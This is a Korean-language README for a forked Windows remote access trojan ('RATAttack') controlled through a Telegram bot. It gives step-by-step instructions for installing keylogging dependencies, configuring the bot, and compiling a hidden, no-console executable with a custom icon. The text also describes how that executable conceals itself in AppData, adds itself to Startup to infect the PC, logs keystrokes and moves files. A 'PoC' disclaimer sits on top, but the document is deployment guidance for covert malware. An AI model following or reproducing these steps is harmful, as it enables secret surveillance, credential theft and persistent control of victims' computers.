
Telegram을 통한 Windows 원격 침해 후 도구
Telegram을 통한 Windows 원격 사후 침해 도구 (Python 2.7), 원래 Ritiek이 만들었고, mvrozanti와 제가 포크하여 수정했습니다.
이 도구의 전체 목적은 이미 침해된 머신을 Telegram을 통해 제어하는 것을 ("PoC"로) 시연하는 것입니다. 제가 이미 작성한 도구들과 마찬가지로, 저는 불법 활동을 조장하지 않습니다.
이 수정된 버전은 기존의 v1 대신 Telegram 봇 API v2를 사용합니다. 주요 변경 사항은 텍스트 입력 대신 키보드 버튼을 사용한다는 것입니다. "mvrozanti"의 필요한 변경 사항을 적용한 후, 새 기능을 추가하고 버그를 해결하며 API v3와 호환되도록 노력하겠습니다. 그동안 cd, download, upload, run 및 delete 명령은 작동하지 않습니다.

file로 Telegram 봇에 전송현재 시장에 있는 원격 관리 도구들은 2가지 주요 문제에 직면해 있습니다:
이 RAT는 Telegram 봇 API를 사용하여 이 두 문제를 모두 해결합니다.
BotFather와 대화하여 새 Telegram 봇을 설정하세요.pip install -r requirements.txt.64-bit 또는 32-bit를 설치하세요.
pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl.pip install pyHook-1.5.1-cp27-cp27m-win32.whl.python RATAttack.py.chat_id를 기록해 두고 스크립트에서 교체한 다음 return True 줄을 주석 처리하세요. 걱정하지 마세요. 스크립트의 주석을 읽으면 알 수 있습니다.
keylogs.txt와 봇에 업로드한 모든 파일이 포함된 RATAttack 폴더가 생성됩니다.compileAndRun.bat에서 경로를 교체하세요. (이것을 실행하면 실제로 실행 파일이 실행됩니다)
`pyinstaller --onefile --noconsole C:\path\to\RATAttack.py`를 실행하세요. 사용자 지정 아이콘을 사용하려면 `--icon=<path\to\icon.ico>`를 전달할 수도 있습니다.
C:\Python27\Scripts\dist\에서 .exe 파일을 찾으세요. .exe의 이름은 원하는 대로 변경할 수 있습니다..exe를 실행하면 스크립트가 스스로를 숨기고 PC를 감염시켜 시작 시 실행되게 합니다. /self_destruct 옵션을 사용하거나 C:\Users\Username\AppData\Roaming\Portal 디렉터리와 C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk를 수동으로 제거하면 정상 상태로 되돌릴 수 있습니다. (지금은 수동으로 제거할 것을 권장합니다).exe 파일의 이름과 숨겨진 .exe가 스스로를 숨길 폴더의 위치 및 이름도 수정할 수 있습니다. 이렇게 하려면 compiled_name과 hide_folder를 각각 수정하세요.The MIT License